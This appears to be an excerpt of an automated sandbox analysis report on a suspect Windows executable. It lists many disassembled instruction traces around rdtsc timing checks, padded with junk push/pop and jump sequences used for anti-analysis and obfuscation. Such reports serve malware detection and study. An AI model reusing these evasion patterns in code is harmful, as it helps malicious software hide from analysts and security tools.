Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 11C0299 second address: 11C029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13300EC second address: 1330112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FF6D0B64824h 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007FF6D0B64816h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1330112 second address: 1330117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1330117 second address: 1330140 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF6D0B64818h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FF6D0B6481Eh 0x00000010 jmp 00007FF6D0B6481Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1330800 second address: 1330806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13347C5 second address: 13347C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13347C9 second address: 1334824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnc 00007FF6D0B95BF4h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jmp 00007FF6D0B95BEAh 0x0000001b pop eax 0x0000001c mov cx, dx 0x0000001f stc 0x00000020 push 00000003h 0x00000022 mov si, AF2Ch 0x00000026 push 00000000h 0x00000028 and edi, dword ptr [ebp+122D279Ah] 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D1B98h], ecx 0x00000036 push A7A48B44h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1334824 second address: 1334828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1334828 second address: 133482C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 133482C second address: 1334835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 133491D second address: 1334943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jns 00007FF6D0B95BECh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF6D0B95BEEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1334943 second address: 1334964 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF6D0B64818h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FF6D0B6481Bh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1334964 second address: 133496A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 133496A second address: 1334980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF6D0B6481Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1334980 second address: 1334A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov cx, si 0x0000000b push 00000003h 0x0000000d push eax 0x0000000e jmp 00007FF6D0B95BEEh 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 mov di, 4957h 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D1DFBh], ecx 0x00000022 mov esi, 181872E3h 0x00000027 push 46124B1Fh 0x0000002c jmp 00007FF6D0B95BF2h 0x00000031 add dword ptr [esp], 79EDB4E1h 0x00000038 mov dx, ax 0x0000003b mov dword ptr [ebp+122D2243h], eax 0x00000041 lea ebx, dword ptr [ebp+1244840Dh] 0x00000047 mov dword ptr [ebp+122D27AFh], edx 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f jmp 00007FF6D0B95BF6h 0x00000054 push eax 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 pop eax 0x00000058 popad 0x00000059 push eax 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FF6D0B95BF5h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1334A19 second address: 1334A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353249 second address: 135326D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007FF6D0B95BE8h 0x0000000c pushad 0x0000000d jns 00007FF6D0B95BE6h 0x00000013 jmp 00007FF6D0B95BEDh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13534CE second address: 13534E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FF6D0B64816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FF6D0B64816h 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353663 second address: 135366D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF6D0B95BE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353A95 second address: 1353A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353A99 second address: 1353A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353A9D second address: 1353ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FF6D0B64816h 0x0000000d jmp 00007FF6D0B6481Ah 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353ABB second address: 1353AD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353EA0 second address: 1353EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353EA6 second address: 1353ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF6D0B95BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6D0B95BF6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353ECC second address: 1353ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1353ED0 second address: 1353ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13541C2 second address: 13541C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13498C8 second address: 13498CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13498CC second address: 13498D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13498D2 second address: 13498D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1354310 second address: 1354317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1354317 second address: 1354321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF6D0B95BE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1354C97 second address: 1354CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF6D0B6481Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1329F33 second address: 1329F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FF6D0B95BEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1329F4B second address: 1329F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135B89F second address: 135B8A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135B8A4 second address: 135B8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135B8B1 second address: 135B8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135B8B7 second address: 135B8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135B8BC second address: 135B8C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135BCBF second address: 135BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF6D0B64816h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13604AF second address: 13604B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13604B5 second address: 13604B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13604B9 second address: 13604D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF6D0B95BEAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13604D9 second address: 13604DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13604DD second address: 13604EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13232C0 second address: 13232C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 135FE1C second address: 135FE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF6D0B95BEAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13621F7 second address: 13621FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1362390 second address: 1362397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13625CC second address: 13625D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13625D0 second address: 13625D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13625D6 second address: 13625E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF6D0B64816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1362CF6 second address: 1362D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov si, ax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FF6D0B95BECh 0x00000016 jno 00007FF6D0B95BE6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1362D12 second address: 1362D2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jc 00007FF6D0B64816h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1362DC0 second address: 1362DCA instructions: 0x00000000 rdtsc 0x00000002 js 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1362EBE second address: 1362EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1363094 second address: 136309A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136309A second address: 13630AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64821h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1363832 second address: 1363842 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1365168 second address: 13651E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF6D0B64818h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D2386h] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FF6D0B64818h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov edi, ecx 0x0000004b mov si, B5CFh 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D279Ah] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jno 00007FF6D0B64816h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13651E8 second address: 13651EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13667BE second address: 13667C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1366548 second address: 1366569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF6D0B95BE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13667C2 second address: 13667EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push esi 0x0000000b mov dword ptr [ebp+1244B1E0h], esi 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jc 00007FF6D0B6481Ch 0x0000001d xor dword ptr [ebp+1246B51Dh], esi 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13667EE second address: 13667F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367210 second address: 1367216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367216 second address: 1367231 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF6D0B95BECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jo 00007FF6D0B95BE6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367CF4 second address: 1367D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64820h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136D195 second address: 136D19F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1367AE0 second address: 1367AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1369097 second address: 136909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136D19F second address: 136D226 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF6D0B6481Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FF6D0B6481Fh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FF6D0B64818h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c jmp 00007FF6D0B64828h 0x00000031 xor dword ptr [ebp+122D1D71h], eax 0x00000037 push 00000000h 0x00000039 sub dword ptr [ebp+1246B55Ch], esi 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FF6D0B64829h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136D226 second address: 136D22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136F301 second address: 136F358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FF6D0B6481Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FF6D0B64818h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub ebx, dword ptr [ebp+122D2374h] 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1CC1h], edi 0x00000037 push 00000000h 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d ja 00007FF6D0B64816h 0x00000043 je 00007FF6D0B64816h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136F358 second address: 136F36F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007FF6D0B95BE6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF6D0B95BE8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1370260 second address: 13702BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF6D0B64816h 0x0000000a popad 0x0000000b nop 0x0000000c cmc 0x0000000d add edi, dword ptr [ebp+12469A9Fh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FF6D0B64818h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D2F0Fh], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FF6D0B64818h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 pop ebx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13702BF second address: 13702C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1371546 second address: 1371550 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF6D0B64816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1371550 second address: 1371556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13724C3 second address: 13724C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
